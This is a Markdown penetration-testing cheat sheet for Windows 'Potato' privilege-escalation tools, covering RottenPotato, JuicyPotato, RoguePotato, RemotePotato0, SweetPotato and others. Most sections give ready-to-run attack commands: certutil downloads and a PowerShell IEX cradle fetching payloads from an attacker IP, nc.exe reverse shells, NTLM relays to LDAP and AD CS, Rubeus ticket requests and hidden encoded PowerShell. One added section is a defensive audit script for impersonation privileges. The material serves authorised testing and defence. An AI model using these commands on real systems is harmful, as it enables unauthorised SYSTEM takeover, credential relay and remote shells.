# Potatoes

* <https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html>
* <https://hideandsec.sh/books/windows-sNL/page/in-the-potato-family-i-want-them-all>

## RottenPotato

* <https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/>
* <https://github.com/foxglovesec/RottenPotato>

```
$ curl -L https://github.com/foxglovesec/RottenPotato/raw/master/rottenpotato.exe > r.exe
meterpreter > upload r.exe
meterpreter > load incognito
meterpreter > execute -cH -f r.exe
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
```

## LonelyPotato

* <https://decoder.cloud/2017/12/23/the-lonely-potato/>
* <https://github.com/decoder-it/lonelypotato>

## JuicyPotato

* <https://ohpe.it/juicy-potato/>
* <https://ohpe.it/juicy-potato/CLSID/>
* <https://github.com/ohpe/juicy-potato/releases>
* <https://github.com/ivanitlearning/Juicy-Potato-x86/releases>

```
$ curl -L https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe > j.exe
...Using pwsh reverse shell...
$ curl -L https://github.com/samratashok/nishang/raw/master/Shells/Invoke-PowerShellTcpOneLine.ps1 > rev.ps1
Cmd > certutil -urlcache -split -f http://10.10.13.37/j.exe C:\Windows\System32\spool\drivers\color\j.exe
Cmd > echo cmd /c powershell -exec bypass -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.13.37/rev.ps1')" > rev.bat
Cmd > .\j.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -l 1337 -p C:\Windows\System32\spool\drivers\color\rev.bat
...Using nc.exe...
Cmd > .\j.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -l 1337 -p C:\Windows\System32\spool\drivers\color\nc.exe "10.10.13.37 1337 -e cmd"
```

## RoguePotato

* <https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/>
* <https://github.com/antonioCoco/RoguePotato/releases>

Redirect traffic that arrives on port 135 of the attacker host (`10.10.13.37`) with `socat` back to port 9999 on the victim (`192.168.1.11`), where RogueOxidResolver is listening locally:

```
$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:192.168.1.11:9999
```

Trigger the potato to run a binary with high privileges (start a listener first if the payload is a reverse shell):

```
Cmd > .\RoguePotato.exe -r 10.10.13.37 -e "C:\windows\Temp\nc.exe 10.10.13.37 443 -e cmd" -l 9999
```

## RemotePotato0

* <https://www.sentinelone.com/labs/relaying-potatoes-another-unexpected-privilege-escalation-vulnerability-in-windows-rpc-protocol/>
* <https://github.com/antonioCoco/RemotePotato0/releases>

Get the session ID of the target user:

```
Cmd > query user
Cmd > quser
```

Hash collector (modes 2 and 3):

```
$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:192.168.1.11:9998
Cmd > .\RemotePotato0.exe -m 2 -x 10.10.13.37 -p 9998 -s 5
```

Cross-protocol relay (modes 0 and 1):

```
$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:192.168.1.11:9998
$ ntlmrelayx.py -t ldap://192.168.1.11 --escalate-user snovvcrash --no-smb-server --no-wcf-server --no-raw-server
Cmd > .\RemotePotato0.exe -m 0 -r 10.10.13.37 -x 10.10.13.37 -p 9998 -s 5
```

[Combining](https://twitter.com/0xcsandker/status/1430111652008112131) with ESC8:

```
$ ntlmrelayx.py -t http://CA01.megacorp.local/certsrv/certfnsh.asp --adcs --template User --no-smb-server --no-wcf-server --no-raw-server
Cmd > .\RemotePotato0.exe -m 0 -r 10.10.13.37 -x 10.10.13.37 -p 9998 -s 5 -c "{f8842f8e-dafe-4b37-9d38-4e0714a61149}"
Cmd > .\Rubeus.exe asktgt /user:snovvcrash /domain:megacorp.local /dc:DC1.megacorp.local /certificate:<BASE64_PFX_CERT> /ptt
```

## GenericPotato

* <https://micahvandeusen.com/the-power-of-seimpersonation/>
* <https://github.com/micahvandeusen/GenericPotato>
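Every potato above abuses a token that holds SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege (the point of the SeImpersonation article linked here). As an added defender-side check, not part of the original page or of GenericPotato, this PowerShell snippet lists which principals are granted those two rights on the local host; it assumes an elevated session and the built-in `secedit` export format.

```powershell
# Added example: audit who holds the two token privileges that Potato-style
# escalations depend on. Not part of the original cheat sheet.
# Assumes an elevated PowerShell session on the host being audited.
function Get-PotatoPrivilegeHolders {
    $cfg = Join-Path $env:TEMP 'user_rights_audit.inf'
    # secedit writes the [Privilege Rights] section as "Name = *SID,*SID,..."
    secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null

    $pattern = '^(SeImpersonatePrivilege|SeAssignPrimaryTokenPrivilege)\s*='
    $lines = Get-Content $cfg | Where-Object { $_ -match $pattern }

    foreach ($line in $lines) {
        $name, $value = $line -split '=', 2
        foreach ($entry in ($value.Trim() -split ',')) {
            $sid = $entry.Trim().TrimStart('*')
            # Resolve SIDs to names; entries already written as names fall through
            try {
                $principal = (New-Object System.Security.Principal.SecurityIdentifier($sid)).
                    Translate([System.Security.Principal.NTAccount]).Value
            } catch {
                $principal = $sid
            }
            [PSCustomObject]@{
                Privilege = $name.Trim()
                Principal = $principal
                Sid       = $sid
            }
        }
    }
    Remove-Item $cfg -ErrorAction SilentlyContinue
}

Get-PotatoPrivilegeHolders | Format-Table -AutoSize
```

By default only Administrators, LOCAL SERVICE, NETWORK SERVICE and the SERVICE group (which covers service and IIS application-pool identities) hold these rights; any additional principal in the output is a candidate for a potato and should be justified or removed.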

## EfsPotato

* <https://github.com/zcgonvh/EfsPotato>

## Tools

### SweetPotato

* <https://github.com/CCob/SweetPotato>

```
Cmd > .\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc <BASE64_CMD>"
```

### MultiPotato

* <https://github.com/S3cur3Th1sSh1t/MultiPotato>
